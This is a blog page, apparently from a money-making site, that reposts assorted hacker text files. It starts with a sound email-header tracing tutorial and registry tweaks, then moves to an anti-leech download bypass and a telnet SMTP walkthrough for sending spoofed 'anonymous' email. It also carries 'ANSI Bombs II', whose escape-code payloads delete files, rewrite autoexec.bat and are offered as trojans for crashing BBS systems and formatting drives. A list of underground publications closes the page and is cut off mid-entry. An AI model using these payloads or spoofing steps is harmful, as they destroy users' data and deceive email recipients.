Most Latest and Profitable Website for Earning Money from Internet by ppc & Earn min 200 $-5000 $/M


Monday, 24 June 2013

Backtracking EMAIL Messages

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately, this is symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from, the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.


Return-Path: <s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>

From: "Maricela Paulson" <s359dyxtt@yahoo.com>

Reply-To: "Maricela Paulson" <s359dyxtt@yahoo.com>

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"


According to the From header this message is from Maricela Paulson at s359dyxtt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be a waste of time. This message didn't come from Yahoo's email service.


The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header, this message was received from the host 12-218-172-108.client.mchsi.com, with the IP address 12.218.172.108, by my server mailhost.example.com. An important question is at what point in the chain the email system becomes untrusted. I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server, it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.


Here is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

OK, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address-to-hostname mapping of the remote server, 12-218-172-108.client.mchsi.com. If I put www. in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message; the best you can hope for is to find out what host sent it. Even in the case of a PGP-signed message there is no guarantee that one particular person actually pressed the send button. Obviously, determining the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.
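The header walk above, as an added example that is not part of the original post: a Python script that parses the quoted Received headers, marks which hop our own server wrote, and flags the signs the author reads by hand (an unqualified HELO name, client-style reverse DNS, an address ending in .0). The trusted relay name mailhost.example.com and the heuristics are assumptions; the whois and nslookup checks are left to the manual steps the post shows.

```python
"""Walk an email's Received chain outward from our own mail server.

Added example, not part of the original post. It parses the headers of the
spam message quoted above and reports, hop by hop, what each relay claims
and which claims come from hosts we do not control. No DNS or WHOIS lookups
happen here; those are the whois/nslookup steps the post shows next.
"""
import email
import ipaddress
import re

# Constructed from the headers quoted in the post (with the author's
# substituted addresses); continuation lines are indented as in a real message.
SAMPLE_MESSAGE = """\
Return-Path: <s359dyxtt@yahoo.com>
Delivered-To: davar@example.com
Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
    by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
    for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)
Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200
From: "Maricela Paulson" <s359dyxtt@yahoo.com>
To: davar@example.com
Subject: STOP-PAYING For Your PAY-PER-VIEW

body text
"""

# Our own mail servers (assumed): Received lines they wrote can be taken at face value.
TRUSTED_RELAYS = {"mailhost.example.com"}

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HELO_RE = re.compile(r"\(HELO\s+([^)\s]+)\)", re.IGNORECASE)
FROM_RE = re.compile(r"^from\s+([^\s(\[]+)", re.IGNORECASE)
BY_RE = re.compile(r"\bby\s+([^\s(;]+)", re.IGNORECASE)


def parse_received(value):
    """Pull the claimed sender, its IP and the recording relay out of one Received header."""
    text = " ".join(value.split())  # unfold continuation lines
    ip, helo = IP_RE.search(text), HELO_RE.search(text)
    name, by = FROM_RE.search(text), BY_RE.search(text)
    return {
        "from": name.group(1) if name else None,  # hostname the relay logged for the client
        "helo": helo.group(1) if helo else None,  # name the client announced itself as
        "ip": ip.group(1) if ip else None,
        "by": by.group(1) if by else None,
        "trusted": False,
        "flags": [],
    }


def suspicious_flags(hop):
    """Heuristics from the post: odd HELO names, client-style reverse DNS, odd IPs."""
    flags = []
    helo, name, ip = hop["helo"], hop["from"], hop["ip"]
    if helo and "." not in helo:
        flags.append("unqualified HELO name")
    if name and ip and name.split(".")[0] == ip.replace(".", "-"):
        flags.append("reverse DNS embeds the client IP (consumer address, not a mail server)")
    if name and ".client." in name:
        flags.append("hostname marks it as an ISP client, not an authorized mail server")
    if ip:
        addr = ipaddress.ip_address(ip)
        if addr.is_private or addr.is_reserved or addr.is_loopback:
            flags.append("non-routable source address")
        if int(addr) & 0xFF == 0:
            flags.append("last octet is 0, unusual for a host address")
    return flags


def trace(raw_message, trusted=TRUSTED_RELAYS):
    """Return the Received hops newest-first with trust and flags filled in."""
    msg = email.message_from_string(raw_message)
    hops = [parse_received(h) for h in msg.get_all("Received", [])]
    for i, hop in enumerate(hops):
        hop["trusted"] = hop["by"] in trusted
        hop["flags"] = suspicious_flags(hop)
        # Each relay should be the "from" host of the hop recorded just above it.
        if i > 0 and hop["by"] != hops[i - 1]["from"]:
            hop["flags"].append("chain break: relay does not match the previous hop")
    return hops


def handoff_ip(hops):
    """IP that handed the message to our trusted server: the last value we can vouch for."""
    for hop in hops:
        if hop["trusted"]:
            return hop["ip"]
    return None


if __name__ == "__main__":
    chain = trace(SAMPLE_MESSAGE)
    for n, hop in enumerate(chain):
        state = "trusted" if hop["trusted"] else "untrusted"
        print(f"hop {n} ({state}): {hop['from'] or hop['helo']} [{hop['ip']}] -> {hop['by']}")
        for flag in hop["flags"]:
            print("    !", flag)
    print("report to the owner of:", handoff_ip(chain))
```

Everything recorded beyond the hand-off IP, the From header included, was written by hosts we do not control and is only a lead, not evidence.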

By Trivedi Jay (B E Electrical Engineer )
email : erjaytrivedi@yahoo.com

B.A. regedit

Ok m8s, any of you that do websites and like to open .html and similar files in Notepad to edit scripts, this is THE coolest Windows registry edit ever. You can download the zip file with the .reg in it (run it and it automatically adds itself to your registry) or do it manually.

http://www.geocities.com/ichbindeingott5/winXP-Notepad.zip

Manually:

Run regedit and navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\Shell
Add the key "notepad".
Its default value should be "Open with Notepad".
Now, under "notepad", add the key "Command".
Its default value should be (with the quotes) "C:\Windows\System32\Notepad.exe" "%1"




ok, exit regedit and go right click on ANY file...
your new option: Open with Notepad

HOW BADASS IS THAT ??? I FOUND THIS ONE ON MY OWN!!!!!!

I know this one works on XP and 2000. You can PROBABLY enter it manually on Windows 9x, but I have not tested that.

Okay okay, I know maybe not everyone cares... but this was fun for me because I love tweaking my computer AND it makes some web design stuff easier for me :D



Auto End Tasks to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.

1. Copy the following (everything in the box) into notepad.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"

2. Save the file as shutdown.reg

3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.




Area Codes and Time Zones




Time Zones 

 Atlantic

 Newfoundland Nova Scotia New Brunswick

 Eastern

 Maine New Hampshire Vermont Massachusetts New York Rhode Island Connecticut Pennsylvania New Jersey Delaware Maryland Ohio Indiana Michigan West Virginia Virginia Kentucky North Carolina Tennessee South Carolina Georgia Florida Quebec Ontario

 Central

 Manitoba North Dakota South Dakota Minnesota Wisconsin Michigan Iowa Nebraska Illinois Kansas Missouri Kentucky Tennessee Arkansas Oklahoma Texas Louisiana Alabama Mississippi Indiana

 Mountain

 Alberta Saskatchewan Montana Idaho Wyoming South Dakota Nebraska Utah Colorado Kansas Oklahoma Arizona New Mexico

 Pacific

 British Columbia Washington Montana Oregon Nevada California Utah


Area Code Listing

   205 - Alabama                       907 - Alaska                      602 - Arizona
   501 - Arkansas                      714 - California (Orange)    818 - California
   213 - California (LA)             916 - California                      619 - California
   415 - California (SF)             408 - California (San Jose)     303 - Colorado
   203 - Connecticut                  302 - Delaware                      904 - Florida
   305 - Florida (Miami)            404 - Georgia (Atlanta)           808 - Hawaii
   208 - Idaho                           312 - Illinois (Chicago)            317 - Indiana
   219 - Indiana (Souend)          515 - Iowa (Des Moines)        316 - Kansas
   502 - Kentucky                     504 - Louisiana (N. Orleans)   207 - Maine
   301 - Maryland                     617 - Massachusetts                313 - Michigan
   616 - Michigan                      612 - Minnesota                      601 - Mississippi
   816 - Missouri (Kansas C)    314 - Kansas (St. Louis)          406 - Montana
   402 - Nebraska                    702 - Nevada                           603 - New Hampshire
   201 - New Jersey (Newark)  609 - New Jersey (I'm here)    505 - New Mexico
   718 - NYC (Brooklyn, S.I.)  212 - NYC (Bronx, Mhattan)   518 - NY (Albany)
   716 - NY (Buffalo)               516 - NY (Long Island)            315 - NY (Syracuse)
   914 - NY (White Plains)       704 - North Carolina                919 - North Carolina
   701 - North Dakota              513 - Ohio (Cincinnati)             216 - Ohio
   614 - Ohio (Columbus)         419 - Ohio (Toledo)                 405 - Oklahoma
   918 - Oklahoma (Tulsa)        503 - Oregon                            215 - Philadelphia PA
   401 - Rhode Island (cough)   803 - South Carolina                 605 - South Dakota
   901 - Tennessee (Memphis)  615 - Tennessee (Nashville)       806 - Texas(Cow Hell)
   214 - Texas (Dallas)             817 - Texas (Forth Worth)         713 - Texas (Houston)
   512 - Texas (San Antonio)    801 - Utah                                 802 - Vermont
   703 - Virginia (Arlington)      804 - Virginia (Richmond)          202 - Washington DC
   206 - Washington (Seattle)   304 - West Virginia                    608 - Wisconsin
   307 - Wyoming                    666 - Where do you think

        Well that will make a nice printout for your wall, won't it.  Now you know where you're calling...





Anti leech hacking tutorial





I was just asking to find out whether there is an audience here before posting. Here is my method for hacking anti-leech. We are going to use a program called Proxomitron. Proxomitron is an anti-junk-script web proxy; it works by applying rules to eliminate pop-ups and many other things, but for our case we need to disable all this filtering first. Go to www.proxomitron.info and download a copy of the program, then unselect all of its options and click on Log Window. Now go to an anti-leech web site and use the plug-in, not NetPumper. In the plug-in, add a proxy: you must put the proxy address 127.0.0.1 port 8080 for HTTP, and the same for FTP. Now select the file to download and click Download. Watch the Proxomitron log window: you will see many internal forwardings. If the file is located on an FTP server, Proxomitron doesn't handle it and you will find an error containing the FTP address. If it is an HTTP address, you will find something like GET /blablabla/bla/file with the site tr.com, and you have found the address: tr.com/blabla/file.



ANSI Bombs II: Tips and Techniques

1. Introduction

 After writing the last file, a lot of people let me know about the mistakes I had made. I guess this file is to clear up those misconceptions and to let people know about some of the little tricks behind ANSI bombing. Of course, ANSI bombing isn't as dangerous as a lot of people make it out to be, but bombs are still fun to make and with a little planning deliver some degree of success. ANSI bombing can be dangerous, so I am tired of hearing people say that an ANSI bomb is harmless, another misconception I hope to clear up. Now, most people that have spent time experimenting with ANSI bombs probably know most of the material in this file, but it might be fun just to read anyway.

2. Misconceptions

 In my last file, I made three major blunders, or what I would consider to be major blunders. First, I said that ANSI bombs could be used on BBSs to screw people over, but I guess I was wrong. It was pure speculation on what other people had said that made me say that. ANSI codes, including those that redefine keys, are sent over the lines, but most comm programs don't use ANSI.SYS; they use their own version of ANSI, which doesn't support key redefinition. Some people might have a program that supports it, but I haven't seen it yet. I have tested bombs on systems on my own and proved to myself that they don't work. I have also seen people fuck up bombs that would have worked by uploading them in a message. The second misconception is that ANSI bombs are dangerous when put into zips. I haven't really tested this out much, but from what I hear with the newer versions of PKZIP, you have to specify that you want to see ANSI comments when unzipping. It is unlikely that you would waste your time unzipping something again after seeing "Format C:" in the middle of an escape code. I could be mistaken, but I'm pretty sure that I'm right. Third, the last thing that was a misconception is that VANSI.SYS will protect your system from key redefinition. Maybe the newer versions don't support key redefinition, but mine sure as hell does. There are programs out there that don't support it, but I don't know any of the names. Of course, if I were you, I would be wary about using something other than ANSI. I have a few friends that are working on "A Better ANSI" for PDers, which, instead of being better, really screws them over.




3. An Overview

 Now, in case you haven't read my other file (it's called ANSI.DOC, kind of lame but fairly informative), I'll briefly go over the structure of an ANSI bomb. Skip this part if you know what an ANSI bomb is and how to make one. In ANSI everything is done with a system of escape codes. Key redefinition is one of those codes. (From now, whenever I say ESC, I really mean the arrow, ). Here is a basic command: ESC [13;27p This would make the <Enter> key (13 is the code for enter) turn into the <Escape> key (27 is the code for escape). The always has to be there, as do the bracket and the "p", but what is between the bracket and the "p" is up to you. The first number is always the key that you want to be redefined. If there is a zero for the first number, that means the key is in the extended set, and therefore, the first two numbers are the code. The bracket signifies the beginning of the definition, and the "p" signifies the end. Whenever you want a key pressed, you have to use its numerical code (i.e. 13 is the code for <Enter>). You can't redefine strings, but you can redefine a key to become a string (i.e. ESC [13;"Blah"p would make <Enter> say "Blah"). Strings must be inside of quotes, which includes commands that you want typed on the DOS prompt (i.e. ESC [13;"Del *.*";13p would delete everything in the directory, note that 13 stands for Enter in this case, not the redefinition). An escape code can have as many commands as you want in it, but each one has to be separated by a semi-colon. You can only redefine one key in each escape code, so if you want to redefine another key, you have to start another escape code. That's about it when it comes to bombs, now that you have the basics, all you really need is a little imagination.

4. Tips and Tricks

A. The Y/N Redefinition

 Now, here's a simple but fun little ANSI bomb:

 ESC [78;89;13p ESC [110;121;13p

 Basically, all this does is turn a capital "N" into "Y" and a lower-case "n" into "y". Alone this doesn't do too much, except for screw around with what they are typing. On the other hand, try adding this line of code to the ANSI bomb:

 ESC [13;27;13;"del *.*";13p

 Most people would automatically press "N" when they see "Del *.*", but when they do, they will be screwed over. This portion of a bomb is very useful when it comes to making good bombs.

 B. Screwing with the Autoexec.bat

 Here is another line of code that you may find useful in future bombing projects:

 ESC [13;27;13;"copy bomb.ans c:\";13;"copy con c:\autoexec.bat";13;"type bomb.ans";13;0;109; 13;"cls";13p

 This line of code makes the bomb a little more permanent and a little more dangerous. It copies the bomb into the root directory, then it changes/creates the autoexec.bat, so the bomb is typed after every boot-up. Of course, the person could just boot off a disk, but I'm sure this would get them a few times. It could also probably appear as though it were a virus, scaring the shit out of the owner of the computer.

C. Turning Commands into Other Commands

 One of the best pranks to do to someone using an ANSI bomb is to redefine commands. That way if they type in "copy", it will turn into "Del *.*". Since you can't actually change the whole string, you have to take a different approach. You have to change a few of the keys, so when typed, they type and execute the desired command. I guess it would be coolest to have the command exactly the same length; that way you could redefine one key at a time to obtain the desired effect. It doesn't really matter how you do it, just as long as it works. You might make an ANSI that says "Wow, check out what this bomb did to your directory", and then have it redefine the keys, so when they type in "dir", it turns into "del". I think you get the idea.

D. Trojans

 By now, everybody knows what a Trojan is. You probably wouldn't think so, but ANSI bombs can be used as Trojans and in Trojans. First, if you are planning on crashing a board, but you're not very good at programming, then make yourself an ANSI bomb. Try to find out in which directory the main files for running the BBS are stored. They are usually under the name BBS or the name of the software, like WWIV or Telegard. Then, make a bomb that either just deletes all the files in that directory, or if you want the board to be down a longer time, then make one that formats the Hard Drive. In this form ANSI bombs, if they are well planned out, can be easy to make Trojans. Second, ANSI bombs can be used in Trojans. This is probably stretching it a little, but say you wanted to write a Trojan that would delete a directory every time you typed a certain key, then you could use an ANSI bomb. First make some batch and com/exe files that would search for protecting programs like Norton and turn them off. Then you could copy the file into the root directory, along with your versions of autoexec.bat, config.sys, ANSI.sys, and whatever else. (To make it look more realistic make the files Resource.00x to trick the user, then when copying, use the real name). Then somehow lock the computer up or do a warm boot through some pd program, which is easily attainable. When the computer loads back up, you can screw the shit out of them with your ANSI bomb.

5. Conclusion

 It would seem to some people that ANSI bombs are very dangerous, and to others that they are stupid or lame. Personally, I think that ANSI bombs are just plain old fun. They're not too hard to make, but there is a lot that you can do with them. They are nowhere near as malicious as virii, so if you're looking for unstoppable destruction, look elsewhere, but they do serve their purpose. I know that there are programs out there that help you program ANSI bombs, but I think that they kind of take the fun out of them. Probably, some day soon, I'll quit making ANSI bombs and start looking more into virii and pure Trojans. But for now, ANSI bombs suit my purpose.
                             
TRG

Appendix A: Key Code Program

 Here is a small program, which I find very helpful. After loading it up, it tells you the numeric code for every key you type in. Special means that it is in the extended set and therefore uses zero, and "q" ends the program. Unfortunately, I can't take any credit for this program. I got it over the phone from Heavymetl, and it was made by his brother. So many thanks go out to Heavymetl and his brother, even though they'll probably be a little pissed at me for including this in my file. It is in Pascal and can be compiled in most Turbo Pascal compilers.

    Uses CRT;
    Var
      CH : CHAR;
    Begin
      Repeat
        CH := ReadKey;
        If CH = #0 then
          Begin
            { A zero first byte means an extended key; the next ReadKey returns its scan code }
            CH := ReadKey;
            WriteLn(CH,'(Special) - ',ORD(CH));
          End
        Else
          WriteLn(CH,' - ',ORD(CH));
      Until
        CH = 'q';
    End.

    Thanks go out to:

 Heavymetl and his brother for the program and ideas. Weapons Master for the input and the help he has given me. Everybody else who has helped me out; you know who you are, or at least, you think you know who you are. Most of all, to those brave soldiers risking their asses everyday for us half-way across the world in Saudi Arabia. Your deeds haven't gone unnoticed, of course that's mainly because that's all the news ever shows nowadays. Also, to anybody else I might have forgotten. Thanks.



ANONYMOUS emails

Welcome to AIACAT on how to send ANONYMOUS e-mails to someone without a prog.

 I am Trivedi Jay and I am going to explain to you a way to send home-made e-mails. I mean it's a way to send anonymous e-mails without a program; it doesn't take too much time, it's cool, and you can gain more knowledge than with a stupid program that does it all by itself.




This way is old (to hackers), but as you are a newbie to this stuff, perhaps you may like to know how these anonymailers work (home-made).

Well.....
Go to Start, then Run...
You have to Telnet (Xserver) on port 25

Well, in place of (Xserver) you have to put the name of a server, without the ( ) of course...
Put iname.com in as (Xserver) because it always works; it is a server with many bugs in it.
(25) is the mail port.

So now we are like this.

telnet iname.com 25

and then you hit enter
Then When you have telnet open put the following like it is written

helo

and the machine will reply with something.

Notice for newbies: If you do not see what you are writing, go to the Terminal menu (in telnet), then to Preferences, and in the Terminal Options tick all the options available; in the Emulation menu, which is the following one, you have to tick the second option.
Now you will see what you are writing.

then you put:

mail from:<whoeveryouwant@whetheveryouwant.whetever.whatever> and so on...
If you make an error start all over again

Example:
mail from:<askbill@microsoft.com.net>

You hit enter and then you put:

rcpt to:<lamer@lamer'sworld.com>
This one has to be an existing address, as you are mailing anonymously to him.

Then you hit enter
And you type
Data
and hit enter once more

Then you write

Subject:whetever

And you hit enter

you write your mail

hit enter again (boring)

you put a simple:
.

Yes, you don't see it, it's the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done

Look: try it first with yourself, I mean mail yourself anonymously so you can test it!
Don't be an asshole and write fucking e-mails to big corps, because it's a symbol of stupidity and childhood and it has a very, very bad effect on hackers; they will treat you as a Lamer!

Really I don't know why I wrote this fucking disclaimer, but I don't want to feel guilty if you get into trouble....

Disclaimer:

Trivedi Jay is not responsible for whatever you do with this info. You can distribute this but you are totally forbidden to take out the "By Trivedi Jay" line. You can't modify or customize this text, and I am also not responsible if you send an e-mail to an important guy and insult him, and I directly advise you that this is for educational purposes only; my idea is for learning and having more knowledge. You can not get busted with this stuff, but I don't care if it happens to you anyway. If this method is new for you, probably you aren't a hacker, so think that if someone wrote you an e-mail as "yourbestfriend@aol.com" insulting you, and it wasn't him but some guy using a program or this info, you won't like it. So use this method if you don't care a damn hell or if you like that someone insults you.




An Introduction to the Computer Underground

The Computer Underground consists of mainly two forms of media, printed and electronic, both will be discussed in this file. I use the word underground because some of the contents of this file are not the types of titles you would run across at your local bookstore or newsstand. The kind of information that makes up underground publications is mainly technical in nature, but, definitely not limited to that. One can also find tidbits about off-the-wall political views, drugs, weapons, and other topics that are not normally in the mainstream of our society.


The Computer Underground...

Com-put-er Un-der-ground   \kem-`pyt-er\  \`en-der-`grand\ (1970's)

  A group organized in secrecy, hidden behind aliases, to promote the free exchange of information regarding anything and everything including but not limited to Computers, Telephones, Radios, Chemicals, and ideas.

The CU is made up of men and women all over the globe and of all ages. Most of those involved in the CU consider it a hobby, but, there are those that are involved strictly for illegal purposes, i.e. Selling Pirated Software. I, like most people involved enjoy the information that can be obtained through all of the different avenues in the CU, i.e. Bulletin Boards, Underground Periodicals, Network Digests, and General Discussions between members.

The most common way members communicate is through Bulletin Boards. If you are reading this you know what a BBS is because this will not be released in printed form. There are thousands of BBSes around the world run by people for many reasons including: legitimate businesses, Software Technical Support, Hobby related, Pirated Software, Message Centers, etc...Some of the more common ones are RIPCO, Face-2-Face, Exec-PC, The Well, etc...

Currently there are many regular electronic magazines that are being published and there have been many that have discontinued for one reason or another. Some current ones include: PHRACK, NIA, PHANTASY, CUD, etc...Some discontinued ones include: PIRATE, PHUN, NARC, etc...

There is a current debate about whether or not an electronic media has the same constitutional rights as the printed one. That is for our congressmen to decide, but you could voice your opinion. I personally can't see the difference. Now, don't get me wrong, I do not support the publishing of long-distance codes or anything of that nature, but I do support the exchange of other information, i.e. how to unprotect a game, how to make a smoke bomb, etc...

There are also "Underground Publications" like TAP, 2600, Cybertek, etc. These magazines are published in hard copy and deal with every considerable topic regarding the CU. Most of these magazines publish completely legal information that is obtained from public sources and is available to anyone and everyone.

I doubt that any of the following sources of information would mind if you use an alias to order any of their material, so I would recommend that you do just in case! You might even want to get yourself a private mail box for all of this "underground" information. I would also advise you to use a money order when purchasing anything also. They usually cost an extra 50 cents at the post office. Don't worry about using money orders with these people because I have personally made purchases from many of them without trouble.

The following information is provided to enable you to become more familiar with the CU and unusual information in general. Have fun and try not to get yourself in trouble.

Now for the meat of this Article!!!!

E L E C T R O N I C   M A G A Z I N E S

PHRACK  Predecessor to Phrack Classic
        Author:  Knight Lightning & Taran King
        Network Address:c483307@umcvmb.missouri.edu
        Other Address:
        BBS: None
        Last Issue: Phrack #30

PHRACK CLASSIC
        Author:  Doc Holiday, Crimson Death & Various Contributors
        Network Address: pc@well.uucp or cdeath@stormking.com
        Other Address:
        BBS:  None
        Last Issue: Phrack Classic #32 11/90

LOD     Legion Of Doom Technical Journals
        Author:  Eric Bloodaxe, Lex Luthor, Prime Suspect, Phase Jitter,
                 Professor Phalken, Skinny Puppy.
        Network Address: None
        Other Address:
        BBS:
        Last Issue:  LOD Tech Journal #4   May 20, 1990

PHUN    Phreakers/Hackers Underground Network
        Author:  Red Knight
        Network Address: N/A
        Other Address:
        BBS:
        Last Issue: P/HUN #5 05/07/90

ATI     Activist Times, Incorporated
        Author:  Ground Zero
        Network Address: gzero@tronsbox.xei.com
        Other Address:  ATI P.O. Box 2501  Bloomfield, NJ 07003
        BBS:
        Last Issue: ATI #53 12/05/90

NIA     Network Information Access
        Author: Guardian Of Time & Judge Dredd
        Network Address:  elisem@nuchat.sccsi.com
        Other Address:
        BBS:
        Last Issue: NIA #70  02/91

PHANTASY
        Author: The Mercenary
        Network Address: None
        Other Address: The I.I.R.G. 862 Farmington Ave, Suite-306,
                       Bristol, Ct 06010
        BBS:  Rune Stone  203-485-0088
        Last Issue: Phantasy V1N4 1/20/91

PIRATE
        Author: Various Authors
        Network Address: N/A
        Other Address:
        BBS: N/A
        Last Issue:  V1 #5 April 1990

ANE     Anarchy 'N' Explosives
        Author: Various Authors
        Network Address: N/A
        Other Address:
        BBS: N/A
        Last Issue:  #7 06/16/89

NARC    Nuclear Phreakers/Hackers/Carders
        Author: The Oxidizer
        Network Address: N/A
        Other Address:
        BBS:
        Last Issue: NARC #7 Fall 1989

SYNDICATE REPORTS
        Author:  The Sensei
        Network Address:
        Other Address:
        BBS:
        Last Issue:

 This is not an attempt to list all of the known magazines, but just some of the more popular ones. If I left a particular one out that you feel should have been included, I apologize.

All of the above magazines can be found in the CUD archives and at many of the Bulletin Board Systems listed at the end of this file.

P R I N T E D    M A G A Z I N E S

Author: Emmanuel Goldstein
Network Address: 2600@well.sf.ca.us
Other Address:   2600 Magazine, P.O. Box 752, Middle Island, NY 11953

2600 Magazine is published quarterly, 48 pages per issue. Subscriptions are $18 U.S. for a year in the U.S. and Canada, $30 overseas. Corporate subscriptions are $45 and $65 respectively. Back issues are available for $25 per year, $30 per year overseas and they go back to 1984.

Phone 516-751-2600
Fax   516-751-2608


TAP/YIPL  Formerly YIPL "Youth International Party Line"
          Now TAP "Technical Assistance Party"

TAP Magazine
P.O. Box 20264
Louisville, KY 40250
Most all issues will cost $1.00 for US Citizens and $2.00
for overseas.  Terms are CASH, postal money order,
or regular money order with the payee left blank.
BBS: 502-499-8933

Cybertek Magazine
Published by OCL/Magnitude
P.O. Box 64
Brewster NY 10509
$2.50 for sample issue
$15 year for 6 issues


Mondo 2000  (Formerly Reality Hackers Magazine / High Frontiers)
P.O. Box 10171
Berkeley, CA 94709-5171
Phone 415-845-9018
Fax   415-649-9630
$24 for five issues
Frank Zappa subscribes to Mondo 2000!!!

Fact Sheet Five
6 Arizona Ave
Rensselaer, NY 12144-4502
$3.50 for a sample issue.
$33 a year for 8 issues
Phone 518-479-3707

Fact Sheet Five reviews any independent news media, i.e. 2600, TAP,
Books, Music, Software, etc.

Full Disclosure  by Glen Roberts
P.O. Box 903-C
Libertyville, Illinois 60048
Free sample issue
$18 for 12 issues

Deals with Privacy, electronic surveillance and related topics.

Anvil
P.O. Box 640383f
El Paso, TX 79904

Computer Security Digest
150 N. Main Street
Plymouth, MI 48170
Phone 313-459-8787
Fax   313-459-2720
$125 U.S. per year.
Overseas $155 U.S. per year.

HAC-TIC Dutch Hacking Magazine
Network Address: ropg@ooc.uva.nl
Other Address:  Hack-Tic P.O. Box 22953  1100 DL Amsterdam
Phone: +31 20 6001480

Privacy Journal
P.O. Box 15300
Washington D.C. 20003
Phone  202-547-2865

Monitoring Times
140 Dog Branch Road
Brasstown, North Carolina 28902


B O O K S

  • Anarchist Cookbook???
  • Poor Man's James Bond by Kurt Saxon
  • Big Secrets by William Poundstone
  • Bigger Secrets by William Poundstone
  • How to get anything on anybody by Lee Lapin
  • Signal--Communication Tools for the Information Age  A Whole Earth Catalog
    (Highly Recommended!!!)
  • Neuromancer by William Gibson
  • Out of The Inner Circle by Bill Landreth
  • Hackers by Steven Levy
  • The Cuckoo's Egg by Clifford Stoll
  • The Shockwave Rider
  • Information for sale by John H. Everett
  • Hackers Handbook III  by Hugo Cornwall
  • Datatheft by Hugo Cornwall
  • The International Handbook on Computer Crime by U. Sieber
  • Fighting Computer Crime by D. Parker
  • Foiling the System Breakers by J. Lobel
  • Privacy in America by D. Linowes
  • Spectacular Computer Crimes by Buck BloomBecker
  • Steal This Book by Abbie Hoffman



M I S C E L L A N E O U S    C A T A L O G S

Loompanics LTD
P.O. Box 1197
Port Townsend, WA 98368

Paladin Press
????


Consumertronics
2011 Crescent DR.
P.O. Drawer 537
Alamogordo, NM 88310
Phone 505-434-0234
Fax   500-434-0234(Orders Only)

Consumertronics sells manuals on many different hacking/phreaking related
topics, i.e. "Voice Mail Box Hacking", "Computer Phreaking", etc.

Eden Press Privacy Catalog
11623 Slater "E"
P.O. Box 8410
Fountain Valley, CA 92728
Phone 1-800-338-8484  24hrs, 7 days a week.

Here is the opening paragraph from their catalog:

Welcome to the Privacy Catalog, Over 300 publications explore every aspect of privacy in ways that are not only unique, but also provocative. Some books may seem "controversial", but that results only from the fact that people can enjoy many different views of the same subject. We endeavor to offer views that will prove both helpful and thoughtful in the many areas where privacy may be a concern.

Criminal Research Products
206-218 East Hector Street
